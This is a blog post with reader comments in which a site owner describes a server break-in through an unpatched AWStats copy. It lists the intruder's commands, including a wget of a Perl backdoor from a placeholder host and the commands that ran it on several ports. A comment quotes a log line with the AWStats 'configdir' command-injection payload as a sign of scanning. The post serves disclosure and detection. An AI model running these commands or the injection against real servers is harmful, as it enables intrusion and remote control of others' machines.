[Update: There’s a new awstats vulnerability out there that affects the stable and development versions, through 6.4. Turn off awstats until they fix this.]
I’m not sure how bad the damage is yet. They got in yesterday through an installation of AWStats that hadn’t been upgraded. We upgraded our main installation but there was another copy that they found. We’re in pretty good company though, Russell Beattie and Jeremy Zawdony got hit with the same thing. If you are running AWStats 6.2 upgrade to 6.3 NOW.
They jumped around IPs using proxy servers, it looks like we were scanned a few times before someone decided to exploit it. The scanner attempts to run the ‘id’ command and if it gets output it figures it found a vulnerable server.
Once inside they created a directory in /tmp called ‘.,’ and put some privilege escalation exploits in there. Not sure what happened after that, their shell’s history file was /dev/null.
The only reason me and a couple other people noticed was because the server was super slow. I guess if script kiddees backdoors were better written, they’d probably be good enough coders to do something worthwhile with their adolescence.
Luckily we found it before they deleted anything, but we’re still checking stuff out and making sure we’ve eradicated them from the system. That’s pretty much all we can do in the short term, although an OS reload looks like it’s in our future.
For those that are interested I’ve put the commands they ran through AWStats in the full entry. Condolences gladly accepted, admonishments for not finding and upgrading all copies of a vulnerable program are not necessary.
[Update: it looks like they were not able to elevate to root, our kernel wasn’t vulnerable to the exploits they had on hand. We were briefly part of an IRC botnet, but judging from our bandwidth utilization at the time it doesn’t appear our server was used in any DDoS attacks.]


Here’s what they did:

id
uname 0a # Note the typo, so it wasn't automated
uname -a

bd.pl is basically a poorly written telnet server that takes the port as the argument

cd /tmp;wget example.net/bd/bd.pl # changed to protect what I assume is another hacked site
cd /tmp;perl bd.pl 123456
cd /tmp;perl bd.pl 12345
cd /tmp;perl bd.pl 1235


6 responses to “My server got 0wned”

  1. Wow, they don’t even realize that port numbers only go up to 32767?
    Anyway, I didn’t even realize awstats had a security hole in it. I’m glad I ended up nuking my (really old) install a few months ago, since all it was doing was attracting referral spammers.

  2. Woah. Thanks for the heads up. I had a couple of servers running out of date copies of awstats, and didn’t realize there was a security hole… No perl files in my /tmp so I think I was OK though. What OS is your server? Does that matter, or is this a generalized risk?

  3. It’s a fairly generalized risk, the Perl program in /tmp/ and the binaries in /tmp/.,/ were just the tools this particular script kiddee used.
    You can tell if your server has been hit by grepping all your logfiles for “configdir”. If you spot a line like this…
    10.0.73.167 – – [01/Feb/2005:19:05:17 -0500] “GET /cgi-bin/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0” 404 301 “-” “Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)”
    … then you probably have been scanned. If you were vulnerable then they probably knew, and you’ll want to look for other commands they ran.

Leave a Reply